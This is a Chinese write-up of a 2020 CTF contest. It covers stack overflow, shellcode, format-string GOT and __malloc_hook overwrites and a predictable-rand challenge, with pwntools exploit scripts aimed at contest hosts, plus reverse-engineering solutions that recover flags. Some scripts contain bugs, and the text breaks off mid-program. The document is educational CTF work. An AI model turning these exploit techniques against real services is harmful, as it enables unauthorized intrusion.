【WriteUp】2020第五届融思杯

PWN

CTFer

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/pwn1'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

源码:

// Challenge entry point (IDA pseudocode). buf sits 0x70 bytes below the saved
// rbp, yet read() accepts up to 0x90 bytes and the binary has no stack canary
// (checksec above): the saved rbp and the return address are overwritable.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-70h]

  setbuf(stdin, 0LL); // stdio left unbuffered
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("Welcome to RSCTF");
  puts("A secret make a CTFer CTFer");
  read(0, &buf, 0x90uLL); // 0x90 > 0x70 + 8: stack overflow
  return 0;
}

target:

// Never called from main(): a helper that spawns a shell, at a fixed address
// because the binary is not PIE. The solution below returns into it.
int target()
{
  puts("QWQ");
  return system("/bin/sh");
}

Solution


直接ret2txt,返回到后门函数

Exp


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 pwntools script: 'A' * n (str) is concatenated with p64() (bytes),
# which Python 3 rejects. The padding covers the 0x70-byte buffer plus the
# saved rbp, then the return address is replaced.
from pwn import *

p = remote('192.168.1.115',28327)
addr_sys = 0x400696  # presumably the address of target(); the symbol is not shown on the page
pd = 'A' * (0x70+8) + p64(addr_sys)
p.sendline(pd)
p.interactive()

Flag


动态flag 

SHer

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/pwn2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

源码:

// Challenge entry point (IDA pseudocode). The stack address of buf is printed,
// NX is disabled (checksec above) and read() accepts 0x210 bytes into a buffer
// that sits 0x200 bytes below the saved rbp: the return address and the buffer
// contents are both attacker-controlled, and the stack is executable.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-200h]

  setbuf(stdin, 0LL); // stdio left unbuffered
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  printf("A secret is [%#llx]\n", &buf); // leaks the buffer address
  puts("Please make buf executable");
  read(0, &buf, 0x210uLL); // 0x210 > 0x200 + 8: stack overflow
  return 0;
}

target

// Never called from main(): a helper that spawns a shell, at a fixed address
// because the binary is not PIE. The write-up uses it as the unintended path.
int target()
{
  puts("QWQ");
  return system("/bin/sh");
}

Solution


题目本意考的是在buf处写入shellcode,返回到buf段执行

但是有个非预期,有后门函数,直接ret2txt,返回到后门函数

Exp


# -*- coding:utf-8 -*-
# Python 2 pwntools script (str and bytes are mixed), run against a local
# process rather than the remote service.
from pwn import *
context(arch = 'amd64',endian = 'el',os = 'linux')
context.log_level = 'debug'
p = process('./pwn2')

shellcode = asm(shellcraft.amd64.sh())
p.recvuntil("A secret is [")
# NOTE(review): `a` is not defined anywhere in this script; it looks like a
# typo for `p`. [:-2] strips the "]\n" that follows the printed address.
addr_buf = int(a.recvuntil("\n")[:-2],16)

pd = shellcode  # overwritten by the next line; effectively dead
pd = shellcode.ljust(0x208,'a')  # 0x200-byte buffer + saved rbp, then the return address
pd += p64(addr_buf)

p.sendafter('executable\n',pd)
p.interactive() 

Flag


动态flag

localover

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/pwn3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

源码:

// Challenge entry point (IDA pseudocode). `f` is a 0x88-byte struct at
// rbp-0x90, but read() accepts 0x100 bytes: f.x (the compared field, at
// offset 0x80 per the Solution text) and, beyond the struct, the saved rbp and
// return address can all be overwritten.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  frame f; // [rsp+10h] [rbp-90h]

  memset(&f, 0, 0x88uLL);
  printf(":>", 0LL, argv);
  fflush(_bss_start); // presumably stdout; IDA resolved the symbol by address
  read(0, &f, 0x100uLL); // 0x100 > 0x88: stack overflow
  printf("x = %lx\n", f.x);
  if ( f.x == -4990306499233399057LL ) // 0xBABEDEADC0DEBEEF read as a signed 64-bit value
  {
    puts("launching shell...");
    system("/bin/sh");
  }
  return 0;
}

Solution


溢出到结构体的f.x,题目很友好,没有去符号化,ida里可以直接看到结构体的偏移为0x80

但是有个非预期,有后门函数,可以直接返回到后门函数

Exp


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 pwntools script (str and bytes are mixed).
from pwn import *

context(log_level="debug", arch="amd64", os="linux")
debug = 2  # 1 = local process, anything else = remote service
if debug == 1:
    p = process("./pwn3")
else:
    p = remote("183.220.1.118",17254)
elf = ELF("./pwn3",checksec=False)

#gdb.attach(p,'b *0x400710\nc')
target = 0xBABEDEADC0DEBEEF  # the f.x comparison constant; unused on the path taken below
addr_sys = 0x400732  # presumably the "launching shell..." branch inside main(); not shown on the page

# 0x98 = 0x90 (distance from f to the saved rbp) + 8 (saved rbp itself)
pd = 'a'*0x98 + p64(addr_sys) # intended solution: pd = 'a'*0x80 + p64(target)
p.sendafter('>',pd)

p.interactive()

Flag


动态flag

assqww

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/assqww'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

源码:

// Challenge entry point (IDA pseudocode). v5 starts at 2 and v3 takes its
// value before the decrement, so the loop body runs exactly twice: two rounds
// of welcome() followed by login() before the program sleeps and exits.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  signed int v3; // eax
  signed int v5; // [rsp+Ch] [rbp-4h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("Toddler's Secure Login System 1.0 beta.");
  v5 = 2;
  while ( 1 )
  {
    v3 = v5--; // post-decrement: v3 is 2, then 1, then 0
    if ( !v3 )
      break;
    welcome();
    login();
  }
  puts("Now I can safely trust you that you have credential :)");
  sleep(0xAu);
  return 0;
}

welcome:

// Prompts for a name and echoes it back. The user's input is then handed to
// printf() as the format argument itself (printf(&format)), a format-string
// vulnerability. The scanf() destination was dropped by the decompiler; from
// the surrounding calls it is presumably &format. The canary in v2 is
// verified on return.
unsigned __int64 welcome()
{
  char format; // [rsp+0h] [rbp-110h]
  unsigned __int64 v2; // [rsp+108h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  buffinit(&format, 248LL);
  printf("enter you name : ", 248LL);
  __isoc99_scanf((__int64)"%256s"); // destination argument not shown in the pseudocode
  printf("Welcome ", &format);
  printf(&format); // user-controlled format string
  putchar(10);
  return __readfsqword(0x28u) ^ v2;
}

login:

// Second prompt of each round. printf(format) is harmless here: `format`
// holds the constant "enter passcode1 :" just copied in by strcpy(). The
// scanf("%ld") destination is not visible in this pseudocode, and no read of
// passcode2 appears at all; the comparison uses v1 and v2 on the stack
// (rbp-0x50 / rbp-0x48), and only the exact pair 0x528E6 / 0xCC07C9 reaches
// flag(). The canary in v8 is verified on return.
unsigned __int64 login()
{
  __int64 v1; // [rsp+0h] [rbp-50h]
  __int64 v2; // [rsp+8h] [rbp-48h]
  char format[8]; // [rsp+10h] [rbp-40h]
  __int64 v4; // [rsp+28h] [rbp-28h]
  __int64 v5; // [rsp+30h] [rbp-20h]
  __int64 v6; // [rsp+38h] [rbp-18h]
  __int64 v7; // [rsp+40h] [rbp-10h]
  unsigned __int64 v8; // [rsp+48h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  strcpy(format, "enter passcode1 :"); // 18 bytes including NUL, spilling into v4 (IDA shows format as 8 bytes)
  v4 = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0LL;
  printf(format); // constant format string, see above
  __isoc99_scanf((__int64)"%ld"); // destination argument not shown in the pseudocode
  fflush(stdin); // undefined by ISO C; presumably meant to discard pending input
  printf("enter passcode2 : ", v1);
  puts("checking...");
  if ( v1 != 0x528E6 || v2 != 0xCC07C9 )
  {
    puts("Login Failed!");
  }
  else
  {
    puts("Login OK!");
    flag();
    puts("Login OK!");
  }
  return __readfsqword(0x28u) ^ v8;
}

flag:

// Reached only from login() after the passcode check; spawns a shell.
// The binary being non-PIE, its address is fixed (used by Exp1 below).
int flag()
{
  return system("/bin/sh");
}

Solution1


脑淤血格式化字符串,题目一开始开了PIE保护,

想到按照题目意思把 V1[$rbp-0x50] 和 V2[$rbp-0x48] 分别改成 0x528E6 和 0xCC07C9, v1 和 v2 也在栈里,

可以输四次格式化字符串,常规改栈

# Fragment of the first (abandoned) attempt: `p`, `target1` and `target2`
# are defined outside this excerpt. Step 1 leaks a stack address with %47$p
# and derives the addresses of v1/v2 from it; step 2 writes those addresses
# (low 16 bits, %hn) into the stack slots at argument offsets 47 and 62;
# step 3 was presumably meant to write the passcode values through them.
# Per the text below, the second stack write never took effect.
p.sendlineafter('name : ', '%47$p')
p.recvuntil('Welcome ')

addr_leak = int(p.recv(14), 16)
addr_v1 = addr_leak - 0x158
addr_v2 = addr_leak - 0x150

pd = '%' + str(addr_v1 & 0xffff) + 'c%47$hn'  #v1
pd += '%' + str((addr_v2 & 0xffff)-(addr_v1 & 0xffff)) + 'c%62$hn' #v2
p.sendlineafter('enter passcode1 :', pd)

pd = '%' + str(target1) + 'c%13$n' #v1
pd += '%' + str(target2-target1) + 'c%73$n' #v2
p.sendlineafter('name : ', pd)

调试发现第二次栈地址怎么都改不掉,暂时没发现原因,

换一种做法,尝试把libc_start_main改成one_gadgets直接提权

调试了两天,均告失败,审计了一下源码,发现了这个

 __isoc99_scanf((__int64)"%ld");

scanf只允许输入一个长整型的数,人都傻了,

vmmap看一下权限

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
          0x400000           0x401000 r-xp     1000 0      /root/CTF/Pwn/RSCTF/assqww
          0x600000           0x601000 r--p     1000 0      /root/CTF/Pwn/RSCTF/assqww
          0x601000           0x602000 rw-p     1000 1000   /root/CTF/Pwn/RSCTF/assqww
    0x7ffff7a0d000     0x7ffff7bcd000 r-xp   1c0000 0      /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7bcd000     0x7ffff7dcd000 ---p   200000 1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7dcd000     0x7ffff7dd1000 r--p     4000 1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7dd1000     0x7ffff7dd3000 rw-p     2000 1c4000 /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7dd3000     0x7ffff7dd7000 rw-p     4000 0      
    0x7ffff7dd7000     0x7ffff7dfd000 r-xp    26000 0      /lib/x86_64-linux-gnu/ld-2.23.so
    0x7ffff7dd7000     0x7ffff7dfd000 rwxp    26000 0      <explored>
    0x7ffff7fce000     0x7ffff7fd1000 rw-p     3000 0      
    0x7ffff7ff7000     0x7ffff7ffa000 r--p     3000 0      [vvar]
    0x7ffff7ffa000     0x7ffff7ffc000 r-xp     2000 0      [vdso]
    0x7ffff7ffc000     0x7ffff7ffd000 r--p     1000 25000  /lib/x86_64-linux-gnu/ld-2.23.so
    0x7ffff7ffd000     0x7ffff7ffe000 rw-p     1000 26000  /lib/x86_64-linux-gnu/ld-2.23.so
    0x7ffff7ffe000     0x7ffff7fff000 rw-p     1000 0      
    0x7ffffffde000     0x7ffffffff000 rw-p    21000 0      [stack]
0xffffffffff600000 0xffffffffff601000 r-xp     1000 0      [vsyscall]

got表可以改!!!!!但是开了PIE保护,拿啥改呢,one_gadgets好像可以,但是题目提供了一个shell函数

百度了一下,和pwnable.kr的passcode这题很像,但是本题开了PIE,又去重新下了个附件

发现PIE保护没了,

到此,这题就思路就明了,格式化字符串把printf函数改成system就结束了

Exp1


#-*-coding:utf-8 -*-
# Final solution for assqww. The re-released binary has no PIE and only
# Partial RELRO (checksec above), so the GOT is writable at a fixed address.
from pwn import *

context(arch = 'amd64',endian = 'el',os = 'linux')
context.log_level = 'debug'
debug = 1  # 1 = local process, anything else = remote service
if debug == 1:
    p = process("./assqww")
else:
    p = remote("183.220.1.118",16708)

elf = ELF("./assqww",checksec=False)

addr_sys = 0x400AE2  # presumably the system("/bin/sh") call site inside flag(); not shown on the page
got_printf = elf.got['printf']

# fmtstr_payload's first argument is the printf argument index at which the
# input buffer appears on the stack; welcome() then prints the name through
# printf(&format), and its next printf() call goes through the patched GOT entry.
pd = fmtstr_payload(6,{got_printf:addr_sys})
p.recvuntil("name : ")
p.sendline(pd)

p.interactive()

Solution2


binlep师傅提供的思路,scanf输入超过0x400会申请堆块,把__malloc_hook改了直接提权

Exp2


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Alternative solution (Solution2 above): point __malloc_hook at a one_gadget,
# then make scanf() call malloc() by sending more than 0x400 bytes.
from pwn import *
debug = 2  # 1 = local process, anything else = remote service
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
  p = process(['./chall'])
else:
  p = remote('183.220.1.118', 18052)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)  # local libc; the remote build may differ
elf = ELF('./chall', checksec=False)  # NOTE(review): the binary is called ./assqww elsewhere in this write-up

pd = '%45$p'  # leak a libc return address from the stack
p.sendlineafter('name : ', pd)
p.recvuntil('Welcome ')

# NOTE(review): two statements were collapsed onto the next line; as written
# it is a SyntaxError. `one = libc.address + 0xf1207` belongs on its own line.
# 240 is the offset of the leaked return address past __libc_start_main, and
# 0xf1207 is a one_gadget offset specific to this libc build.
libc.address = int(p.recv(14), 16) - libc.sym['__libc_start_main'] - 240 one = libc.address + 0xf1207

p.sendlineafter('passcode1 :', '1')
# gdb.attach(p, 'brva 0xa96\nbrva 0x97A\nb malloc\nc')

pd = fmtstr_payload(6, {libc.sym['__malloc_hook']:one})
p.sendlineafter(' name : ', pd)
p.sendlineafter('passcode1 :', '1' * 0x400)  # oversized input makes scanf allocate, which fires the hook

p.interactive()

Flag


动态flag 

unlink

用栈考unlink,我也unlink了,去学习unlink了,之后补题解

random

Description


保护:

[*] '/root/CTF/Pwn/RSCTF/pwn6'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

源码:

// Challenge entry point (IDA pseudocode). Two rand() calls are combined into
// v6: the high 16 bits of the first (LOWORD cleared) and the low 16 bits of
// the second. No srand() appears in this function, so the C library's default
// seed makes v6 the same on every run (the debugger session below observed
// 0x6b8b23c6). A shell is spawned when v6 ^ v5 == 0x12345678.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  int v5; // [rsp+0h] [rbp-20h]
  int v6; // [rsp+4h] [rbp-1Ch]
  unsigned __int64 v7; // [rsp+8h] [rbp-18h]

  v7 = __readfsqword(0x28u);
  v3 = rand();
  LOWORD(v3) = 0;
  v6 = v3 | (unsigned __int16)rand();
  v5 = 0;
  __isoc99_scanf(&unk_8E8, &v5); // format not resolved by IDA; presumably "%d" since v5 is an int
  if ( (v6 ^ v5) == 305419896 ) // 0x12345678
  {
    puts("Congratulations my friend!");
    system("/bin/sh");
  }
  else
  {
    puts("Wrong, maybe you  are close or not.");
  }
  return 0;
}

Solution


代码很简单,生成两个伪随机数,输入的数和V6异或等于0x12345678就给shell

直接在cmp下断点

.text:0000000000000809                 cmp     eax, 12345678h

V6存在rbp-0x1c

pwndbg> 
0x0000555555554809 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────
 RAX  0x6b9a0051
 RBX  0x6b8b0000
 RCX  0x10
 RDX  0x7ffff7dd3790 (_IO_stdfile_0_lock) ◂— 0x0
 RDI  0x7fffffffd910 ◂— 0x33323233323131 /* '1123223' */
 RSI  0x1
 R8   0x0
 R9   0x0
 R10  0x0
 R11  0x7ffff7b846a0 (_nl_C_LC_CTYPE_class+256) ◂— add    al, byte ptr [rax]
 R12  0x5555555546a0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffdf30 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffde50 —▸ 0x555555554860 (__libc_csu_init) ◂— push   r15
 RSP  0x7fffffffde30 ◂— 0x6b8b23c600112397
 RIP  0x555555554809 (main+95) ◂— cmp    eax, 0x12345678
────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────
   0x5555555547f2 <main+72>     lea    rdi, [rip + 0xef]
   0x5555555547f9 <main+79>     mov    eax, 0
   0x5555555547fe <main+84>     call   __isoc99_scanf@plt <0x555555554670>

   0x555555554803 <main+89>     mov    eax, dword ptr [rbp - 0x20]
   0x555555554806 <main+92>     xor    eax, dword ptr [rbp - 0x1c]
 ► 0x555555554809 <main+95>     cmp    eax, 0x12345678
   0x55555555480e <main+100>    jne    main+138 <0x555555554834>
    ↓
   0x555555554834 <main+138>    lea    rdi, [rip + 0xd5]
   0x55555555483b <main+145>    call   puts@plt <0x555555554640>

   0x555555554840 <main+150>    mov    eax, 0
   0x555555554845 <main+155>    mov    rdx, qword ptr [rbp - 0x18]
────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fffffffde30 ◂— 0x6b8b23c600112397
01:0008│      0x7fffffffde38 ◂— 0xf316eb1d17b95600
02:0010│      0x7fffffffde40 —▸ 0x7fffffffdf30 ◂— 0x1
03:0018│      0x7fffffffde48 ◂— 0x0
04:0020│ rbp  0x7fffffffde50 —▸ 0x555555554860 (__libc_csu_init) ◂— push   r15
05:0028│      0x7fffffffde58 —▸ 0x7ffff7a2d840 (__libc_start_main+240) ◂— mov    edi, eax
06:0030│      0x7fffffffde60 ◂— 0x1
07:0038│      0x7fffffffde68 —▸ 0x7fffffffdf38 —▸ 0x7fffffffe2e2 ◂— '/root/CTF/Pwn/RSCTF/pwn6'
──────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────
 ► f 0     555555554809 main+95
   f 1     7ffff7a2d840 __libc_start_main+240
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/wx $rbp-0x1c
0x7fffffffde34: 0x6b8b23c6

V6 = 0x6b8b23c6

那么V6与0x12345678异或就可以算出V5了

Exp


#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 2  # 1 = local process, anything else = remote service
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process('./pwn6')
else:
    p = remote('183.220.1.118',14379)

#gdb.attach(p ,'b random\nc')
# v6 as read from [rbp-0x1c] in the debugger session above. rand() is never
# seeded, so the remote side presumably produces the same value (assuming the
# same C library).
rand_ = 0x6b8b23c6
pd = rand_ ^ 0x12345678  # XOR is its own inverse: (v6 ^ pd) == 0x12345678
p.sendline(str(pd))

p.interactive()

Flag


动态flag 

RE

RE1

Solution


直接ida,shift+f12,ctrl+f搜索flag

Flag


flag{this_ls_flag}

RE2

Description


源码:

// Challenge entry point (IDA pseudocode, 32-bit; time64() and system("pause")
// suggest a Windows build). A time-seeded random number in 1..10000 must be
// guessed; on a match the 32 bytes held in v6..v13 are printed one at a time
// after XOR with 0x11. sub_401020 / sub_401050 are not shown; from their
// arguments they are presumably printf / scanf.
int sub_401080()
{
  unsigned int v0; // eax
  int v1; // esi
  char v2; // ST0C_1
  signed int v3; // esi
  int v5; // [esp+4h] [ebp-2Ch]
  int v6; // [esp+8h] [ebp-28h]
  int v7; // [esp+Ch] [ebp-24h]
  int v8; // [esp+10h] [ebp-20h]
  int v9; // [esp+14h] [ebp-1Ch]
  int v10; // [esp+18h] [ebp-18h]
  int v11; // [esp+1Ch] [ebp-14h]
  int v12; // [esp+20h] [ebp-10h]
  int v13; // [esp+24h] [ebp-Ch]
  char v14; // [esp+28h] [ebp-8h]

  v0 = time64(0);
  srand(v0);
  v1 = 10000 * rand() / 0x8000 + 1; // 1..10000 when rand() < 0x8000
  ((void (__cdecl *)(const char *, char))sub_401020)("please input a number:", v2);
  sub_401050("%d", (unsigned int)&v5);
  if ( v1 == v5 )
  {
    v6 = 611328289; // v6..v13: the XOR-encoded flag, 32 bytes little-endian (see Solution)
    v3 = 0;
    v7 = 695562785;
    v8 = 639791648;
    v9 = 578037106;
    v10 = 695476265;
    v11 = 1931487008;
    v12 = 656831779;
    v13 = 690233379;
    v14 = 0; // terminating NUL after the 32 bytes
    do
      sub_401020((const char *)&unk_402118, *((_BYTE *)&v6 + v3++) ^ 0x11); // presumably printf("%c", byte ^ 0x11)
    while ( v3 < 32 );
    sub_401020((const char *)&unk_40211C);
  }
  system("pause");
  return 0;
}

Solution


八个int类型的整数与0x11进行异或,把每个整数转成4个两位十六进制数,由低位到高位分别于0x11异或,结果转成字符即可

Exp


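# The eight ints v6..v13 from sub_401080, expanded to their little-endian
# bytes (e.g. 611328289 == 0x24702121 -> 21 21 70 24), 32 bytes in all.
# (The original script named this `list`, shadowing the builtin.)
enc_bytes = [0x21,0x21,0x70,0x24,
             0x21,0x72,0x75,0x29,
             0x20,0x72,0x22,0x26,
             0x72,0x25,0x74,0x22,
             0x29,0x20,0x74,0x29,
             0x20,0x27,0x20,0x73,
             0x23,0x75,0x26,0x27,
             0x23,0x20,0x24,0x29,]

# XOR with 0x11 is its own inverse, so this reproduces what the binary prints.
flag = ''.join(chr(b ^ 0x11) for b in enc_bytes)
print('flag{' + flag + '}')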

Flag


flag{00a50cd81c37c4e381e8161b2d762158}

RE3

Description


源码:

// Challenge entry point (IDA pseudocode). ptrace(PTRACE_TRACEME) fails when a
// debugger is already attached, which is used as an anti-debugging check.
// The first 32 input bytes are transformed in place (input[i] -= i / 2,
// integer division) and compared with arr, so the flag is arr with the same
// amounts added back (see the script below).
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+Ch] [rbp-444h]
  char arr[33]; // [rsp+10h] [rbp-440h]
  char input[1024]; // [rsp+40h] [rbp-410h]
  unsigned __int64 v7; // [rsp+448h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  strcpy(arr, "f5bd0a6c0].`0[Z+)[./,ZWV)'#$$$%T"); // 32 characters + NUL
  memset(input, 0, sizeof(input));
  printf("input flag:", argv, input);
  if ( ptrace(0, 0LL) < 0 ) // 0 == PTRACE_TRACEME
  {
    printf("no!");
    exit(0);
  }
  __isoc99_scanf("%s", input); // unbounded read into a 1024-byte buffer
  for ( i = 0; i <= 31; ++i )
    input[i] -= i / 2; // 0,0,1,1,2,2,... subtracted from successive bytes
  if ( !strcmp(arr, input) )
    printf("yes", input);
  else
    printf("no", input);
  putchar(10);
  return 0;
}

Solution


关键点

 for ( i = 0; i <= 31; ++i )
    input[i] -= i / 2;

反着写脚本就行

Exp


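# arr from main(): what the input must equal after input[i] -= i / 2.
str_ = "f5bd0a6c0].`0[Z+)[./,ZWV)'#$$$%T"
# Invert the transform by adding i // 2 back. Integer division matters: the
# C code divides ints, and the original Python 2 script relied on `/`
# truncating, which Python 3's `/` no longer does (chr() would get a float).
flag = ''.join(chr(ord(ch) + i // 2) for i, ch in enumerate(str_[:32]))

print('flag{' + flag + '}')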

Flag


flag{f5ce2c9f4a3e6aa21c786dba5301224c}

RE4

RC4加密,赛后复现一下

Description


源码:

// Challenge entry point (IDA pseudocode). The input must be exactly 32 bytes.
// v6 holds 111482039922277 == 0x65646F636E65, the little-endian bytes of
// "encode", followed by a zeroed 0xF8-byte tail: this is the key passed to
// sub_400DE0 (not reproduced on the page; the listing under that heading is a
// copy of sub_400CE0). sub_400CE0 then hex-encodes the result into a freshly
// allocated 0x40-byte buffer, which is compared with the 64-character s2.
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 v3; // rbp
  const char *v4; // rbx
  __int64 v6; // [rsp+0h] [rbp-8F8h]
  char v7; // [rsp+8h] [rbp-8F0h]
  char s2[8]; // [rsp+100h] [rbp-7F8h]
  char v9; // [rsp+148h] [rbp-7B0h]
  char s; // [rsp+4F0h] [rbp-408h]
  unsigned __int64 v11; // [rsp+8D8h] [rbp-20h]

  v11 = __readfsqword(0x28u);
  strcpy(s2, "AC6297BD8C53021894A5EADEA1FD9E8A0F0C7845A199FF1C0D8F970DB02B6802"); // expected hex output
  memset(&v9, 0, 0x3A0uLL);
  memset(&s, 0, 0x3E8uLL);
  std::__ostream_insert<char,std::char_traits<char>>(&std::cout, "input flag:", 11LL);
  std::endl<char,std::char_traits<char>>(&std::cout);
  std::operator>><char,std::char_traits<char>>(&std::cin, &s);
  v6 = 111482039922277LL; // "encode" as a little-endian integer
  memset(&v7, 0, 0xF8uLL); // NUL-terminates the key
  if ( strlen(&s) != 32 )
  {
    std::__ostream_insert<char,std::char_traits<char>>(&std::cout, "no", 2LL);
    std::endl<char,std::char_traits<char>>(&std::cout);
    exit(0);
  }
  v3 = sub_400DE0(&s, (char *)&v6); // presumably returns the encrypted buffer
  v4 = (const char *)operator new[](0x40uLL); // 64 bytes: 2 hex chars per input byte, no room for a NUL
  sub_400CE0(v3, v4);
  if ( !strcmp(v4, s2) )
    std::__ostream_insert<char,std::char_traits<char>>(&std::cout, "yes", 3LL);
  else
    std::__ostream_insert<char,std::char_traits<char>>(&std::cout, "no", 2LL);
  std::endl<char,std::char_traits<char>>(&std::cout);
  return 0LL;
}

sub_400DE0:

// NOTE(review): the page heads this listing "sub_400DE0:", but it is the same
// text as the sub_400CE0 listing that follows; the RC4 routine itself is not
// reproduced.
//
// Hex-encodes the string a1 into a2, two ASCII characters per input byte,
// and returns strlen(a1). Not a standard hex dump: a byte whose high bit is
// set (negative `char`) is encoded as 128 - c instead of c & 0xFF, and digit
// values above 9 become 'A'.. (55 + 10 == 'A'). The C program in the Exp
// section inverts this mapping by brute force. No terminating NUL is written.
__int64 __fastcall sub_400CE0(const char *a1, __int64 a2)
{
  const char *v2; // rbx
  __int64 result; // rax
  unsigned __int64 v4; // rdi
  int v5; // edx
  int v6; // ecx
  int v7; // ecx
  char v8; // r9
  int v9; // edx
  char v10; // r8
  bool v11; // cc
  char v12; // cl
  char v13; // dl

  v2 = a1;
  result = (int)strlen(a1);
  if ( (_DWORD)result )
  {
    v4 = 0LL;
    do
    {
      v5 = v2[v4];
      if ( v2[v4] < 0 )
        v5 = 128 - v5; // the non-standard step for bytes >= 0x80
      v6 = v5 + 15;
      if ( v5 >= 0 )
        v6 = v5; // compiler idiom for signed v5 / 16 (v5 is never negative here)
      v7 = v6 >> 4; // high nibble
      v8 = v7 + 55;
      v9 = v5 % 16; // low nibble
      v10 = v7 + 48;
      v11 = v7 < 10;
      v12 = v9 + 48;
      if ( !v11 )
        v10 = v8;
      v11 = v9 < 10;
      *(_BYTE *)(a2 + 2 * v4) = v10;
      v13 = v9 + 55;
      if ( v11 )
        v13 = v12;
      *(_BYTE *)(a2 + 2 * v4++ + 1) = v13;
    }
    while ( v4 < (int)result );
  }
  return result;
}

sub_400CE0:

// Hex-encodes the string a1 into a2, two ASCII characters per input byte,
// and returns strlen(a1). Not a standard hex dump: a byte whose high bit is
// set (negative `char`) is encoded as 128 - c instead of c & 0xFF, and digit
// values above 9 become 'A'.. (55 + 10 == 'A'). The C program in the Exp
// section inverts this mapping by brute force. No terminating NUL is written.
__int64 __fastcall sub_400CE0(const char *a1, __int64 a2)
{
  const char *v2; // rbx
  __int64 result; // rax
  unsigned __int64 v4; // rdi
  int v5; // edx
  int v6; // ecx
  int v7; // ecx
  char v8; // r9
  int v9; // edx
  char v10; // r8
  bool v11; // cc
  char v12; // cl
  char v13; // dl

  v2 = a1;
  result = (int)strlen(a1);
  if ( (_DWORD)result )
  {
    v4 = 0LL;
    do
    {
      v5 = v2[v4];
      if ( v2[v4] < 0 )
        v5 = 128 - v5; // the non-standard step for bytes >= 0x80
      v6 = v5 + 15;
      if ( v5 >= 0 )
        v6 = v5; // compiler idiom for signed v5 / 16 (v5 is never negative here)
      v7 = v6 >> 4; // high nibble
      v8 = v7 + 55;
      v9 = v5 % 16; // low nibble
      v10 = v7 + 48;
      v11 = v7 < 10;
      v12 = v9 + 48;
      if ( !v11 )
        v10 = v8;
      v11 = v9 < 10;
      *(_BYTE *)(a2 + 2 * v4) = v10;
      v13 = v9 + 55;
      if ( v11 )
        v13 = v12;
      *(_BYTE *)(a2 + 2 * v4++ + 1) = v13;
    }
    while ( v4 < (int)result );
  }
  return result;
}

Solution


比正常RC4多了一道加密

Exp


用c语言转成正常加密的RC4

#include <stdio.h>

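/*
 * Invert the binary's non-standard hex encoder (sub_400CE0) to recover the
 * 32 raw bytes it hex-encoded, i.e. the RC4 ciphertext.
 *
 * The encoder maps a signed byte c to the two hex digits of v, where
 * v = c for 0 <= c <= 127 and v = 128 - c for negative c. Since that is not
 * the usual unsigned mapping, each output pair is inverted by brute force:
 * every signed byte is encoded until the pair is reproduced. The recovered
 * bytes are printed as lowercase hex (no trailing newline); if a pair has
 * no preimage (e.g. "80") the program reports it and exits with status 1
 * instead of looping forever as the original `char j` loop would.
 */

/* Emit the two characters sub_400CE0 produces for the signed byte c (-128..127). */
static void encode_byte(int c, char *hi, char *lo)
{
    int v = c;
    if (c < 0)
        v = 128 - v;            /* the binary's quirk: not taken modulo 256 */
    int t = v + 15;
    if (v >= 0)
        t = v;                  /* signed division by 16 as in the decompiled code; v is never negative here */
    int h = t >> 4;
    int l = v % 16;
    *hi = (char)(h < 10 ? h + '0' : h + 55);   /* 55 + 10 == 'A' */
    *lo = (char)(l < 10 ? l + '0' : l + 55);
}

int main(void)
{
    const char res[] =
        "AC6297BD8C53021894A5EADEA1FD9E8A0F0C7845A199FF1C0D8F970DB02B6802";
    unsigned char a[0x30] = {0};    /* recovered bytes (also printed) */
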